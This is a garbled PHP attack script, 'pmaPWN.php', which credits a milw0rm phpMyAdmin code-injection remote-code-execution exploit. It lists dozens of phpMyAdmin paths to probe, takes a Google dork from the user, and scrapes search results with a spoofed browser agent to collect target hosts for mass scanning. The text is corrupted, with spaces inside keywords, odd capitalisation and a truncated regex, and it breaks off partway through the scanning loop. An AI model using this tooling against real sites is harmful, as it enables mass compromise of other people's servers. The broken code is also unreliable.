Format: php
<? Php
$ List = array (
/Phpmyadmin /,
/PhpMyAdmin /,
/PMA /,
/Pma /,
/Admin /,
/Dbadmin /,
/Mysql /,
/Myadmin /,
/Phpmyadmin2 /,
/PhpMyAdmin2 /,
/PhpMyAdmin-2 /,
/Php-my-admin /,
/PhpMyAdmin-2.2.3 /,
/PhpMyAdmin-2.2.6 /,
/PhpMyAdmin-2.5.1 /,
/PhpMyAdmin-2.5.4 /,
/PhpMyAdmin-2.5.5-rc1 /,
/PhpMyAdmin-2.5.5-rc2 /,
/PhpMyAdmin-2.5.5 /,
/PhpMyAdmin-2.5.5-pl1 /,
/PhpMyAdmin-2.5.6-rc1 /,
/PhpMyAdmin-2.5.6-rc2 /,
/PhpMyAdmin-2.5.6 /,
/PhpMyAdmin-2.5.7 /,
/PhpMyAdmin-2.5.7-pl1 /,
/PhpMyAdmin-2.6.0-alpha /,
/PhpMyAdmin-2.6.0-alpha2 /,
/PhpMyAdmin-2.6.0-beta1 /,
/PhpMyAdmin-2.6.0-beta2 /,
/PhpMyAdmin-2.6.0-rc1 /,
/PhpMyAdmin-2.6.0-rc2 /,
/PhpMyAdmin-2.6.0-rc3 /,
/PhpMyAdmin-2.6.0 /,
/PhpMyAdmin-2.6.0-pl1 /,
/PhpMyAdmin-2.6.0-pl2 /,
/PhpMyAdmin-2.6.0-pl3 /,
/PhpMyAdmin-2.6.1-rc1 /,
/PhpMyAdmin-2.6.1-rc2 /,
/PhpMyAdmin-2.6.1 /,
/PhpMyAdmin-2.6.1-pl1 /,
/PhpMyAdmin-2.6.1-pl2 /,
/PhpMyAdmin-2.6.1-pl3 /,
/PhpMyAdmin-2.6.2-rc1 /,
/PhpMyAdmin-2.6.2-beta1 /,
/PhpMyAdmin-2.6.2-rc1 /,
/PhpMyAdmin-2.6.2 /,
/PhpMyAdmin-2.6.2-pl1 /,
/PhpMyAdmin-2.6.3 /,
/PhpMyAdmin-2.6.3-rc1 /,
/PhpMyAdmin-2.6.3 /,
/PhpMyAdmin-2.6.3-pl1 /,
/PhpMyAdmin-2.6.4-rc1 /,
/PhpMyAdmin-2.6.4-pl1 /,
/PhpMyAdmin-2.6.4-pl2 /,
/PhpMyAdmin-2.6.4-pl3 /,
/PhpMyAdmin-2.6.4-pl4 /,
/PhpMyAdmin-2.6.4 /,
/PhpMyAdmin-2.7.0-beta1 /,
/PhpMyAdmin-2.7.0-rc1 /,
/PhpMyAdmin-2.7.0-pl1 /,
/PhpMyAdmin-2.7.0-pl2 /,
/PhpMyAdmin-2.7.0 /,
/PhpMyAdmin-2.8.0-beta1 /,
/PhpMyAdmin-2.8.0-rc1 /,
/PhpMyAdmin-2.8.0-rc2 /,
/PhpMyAdmin-2.8.0 /,
/PhpMyAdmin-2.8.0.1 /,
/PhpMyAdmin-2.8.0.2 /,
/PhpMyAdmin-2.8.0.3 /,
/PhpMyAdmin-2.8.0.4 /,
/PhpMyAdmin-2.8.1-rc1 /,
/PhpMyAdmin-2.8.1 /,
/PhpMyAdmin-2.8.2 /,
/Sqlmanager /,
/Mysqlmanager /,
/P/m//,
/PMA2005 /,
/Pma2005 /,
/Phpmanager /,
/Php-myadmin /,
/Phpmy-admin /,
/Webadmin /,
/Sqlweb /,
/Websql /,
/Webdb /,
/Mysqladmin /,
/Mysql-admin /,
);
If ($ argc> 1 ){
Print "| ************************************* * ************************** | ";
Print "pmaPWN. php-d3ck4, hacking.expose@gmail.com ";
Print "phpMyAdmin Code Injection RCE response & Exploit ";
Print "This is PHP version original http://milw0rm.com/exploits/8921 ";
Print "credit: Greg Ose, pagvac @ gnucitizen.org ";
Print "greetz: Hacking Expose !, HM Security, darkc0de ";
Print "| ************************************* * ************************** | ";
Print "";
Print "Usage: php $ argv [0]";
Exit;
}
Print "| ************************************* * ************************** | ";
Print "pmaPWN. php-d3ck4, hacking.expose@gmail.com ";
Print "phpMyAdmin Code Injection RCE response & Exploit ";
Print "This is PHP version original http://milw0rm.com/exploits/8921 ";
Print "credit: Greg Ose, pagvac @ gnucitizen.org ";
Print "greetz: Hacking Expose !, HM Security, darkc0de ";
Print "| ************************************* * ************************** | ";
Print "";
$ Handlex = FOpen ("pmaPWN. log", "a + ");
FWrite ($ Handlex, "| ************************************** * ************************* | ");
FWrite ($ Handlex, "pmaPWN. php-d3ck4, hacking.expose@gmail.com ");
FWrite ($ Handlex, "phpMyAdmin Code Injection RCE response & Exploit ");
FWrite ($ Handlex, "This is PHP version original http://milw0rm.com/exploits/8921 ");
FWrite ($ Handlex, "credit: Greg Ose, pagvac @ gnucitizen.org ");
FWrite ($ Handlex, "greetz: Hacking Expose !, HM Security, darkc0de ");
FWrite ($ Handlex, "| ************************************** * ************************* | ");
Print "[-] Master, where you want to go today? ";
Print "[-] example dork: intitle: phpMyAdmin ";
Fwrite (STDOUT, "[pwn3r @ google ~] ./Dork-s ");
$ Dork = trim (fgets (STDIN ));
Print "[!] QUERY: Select * FROM 'db db' Where 'keyword' = $ dork ";
FWrite ($ Handlex, "[!] QUERY: Select * FROM 'db db' Where 'keyword' = $ dork ");
For ($ I = 0; $ I <= 900; $ I + = 100 ){
$ Ch = curl_init ();
Curl_setopt ($ ch, CURLOPT_URL, "http://www.google.com/cse? Cx = 013269018370076798483% 3Awdba3dlnxqm & q = $ dork & num = 100 & hl = en & as_qdr = all & start = $ I & sa = N ");
Curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, true );
Curl_setopt ($ ch, CURLOPT_TIMEOUT, 200 );
Curl_setopt ($ ch, CURLOPT_HEADER, 1 );
Curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, 1 );
Curl_setopt ($ ch, CURLOPT_REFERER, "http://google.com ");
Curl_setopt ($ ch, CURLOPT_USERAGENT, Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: 1.8.1.9) Gecko/20071025 Firefox/2.0.0.9 );
$ Pg = curl_exec ($ ch );
Curl_close ($ ch );
If (preg_match_all ("/
}
Foreach ($ res as $ key ){
Foreach ($ key as $ target ){
$ Total ++;
}
}
Print "[+] Done. $ total rows return .";
FWrite ($ Handlex, "[+] Done. $ total rows return .");
FClose ($ Handlex );
Foreach ($ res as $ key ){
Foreach ($ key as $ target ){
$ Handlex = FOpen ("pmaPWN. log", "a + ");
$ Real = parse_url ($ target );
$ Url = "http: //". $ real [host];
Print "[-] Scanning phpMyAdmin